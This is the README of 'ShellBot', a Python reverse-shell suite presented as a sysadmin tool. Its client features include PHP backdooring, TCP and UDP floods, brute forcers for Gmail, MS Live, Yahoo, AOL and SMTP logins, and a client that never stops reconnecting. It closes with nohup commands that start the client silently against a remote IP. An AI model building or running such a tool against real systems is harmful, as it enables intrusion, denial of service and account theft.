ShellBot
An advanced reverse shell written in Python3.
ShellBot is a cross-platform Remote Shell Suite where the Server can be managed by 1 Controller at a time.
A server can accept several clients at once, and relay a chosen client's shell to the controller.
This makes it easy for an SysAdmin to manage several computers with minimal setup in an internal network.
The ShellBot suite is designed in such a way that it will not stop till a connection is achieved. All errors are handled internally and in case of a crash, the program automatically restarts.
Features:
Server:
- Can handle multiple connections all at once.
- The Controller’s connection requires a plain text password, it’s not the best security, but at-least it is better than nothing. Will be improved on in future revisions.
- Kicks the Controller after 5 mins. (As the Server only accepts 1 controller at a time). TODO: Make it 5 minutes after inactivity.
Client:
- Infected PHP Backdooring Function. (Linux Only)
- TCP Flood.
- UDP Flood.
- Gmail Bruteforcer. (Workaround Gmail's SMTP login)
- MS Live Bruteforcer.
- Yahoo Bruteforcer.
- AOL Bruteforce.
- Custome SMTP Bruteforcer. If found, the password will be saved as "password.txt" on the client.
- OTA Updating.
- Hardened Shell: Handles No Output, Wrong, Interactive and Infinite commands will result in losing the shell.
- Can handle multiple commands separated by semi-colon (;).
- Never closes and is always trying to connect to the Server.
- Can handle almost any non-interactive command properly.
- Uses very less resources.
- Can be packaged into executables with tools like pyInstaller.
Controller:
- Handles
KeyboardInterrupts, empty commands, etc. perfectly. - Easy user interface.
Note: When trying to start the client through SSH, Terminal or any other
interactive shell, it is advised to start the client in another process. This
can be done in Linux with nohup.
Example:
nohup python3 client.py 15.48.158.15 1567 > /dev/null &
nohup python3 client.py 15.48.158.15 1567 > /dev/null 2>&1 &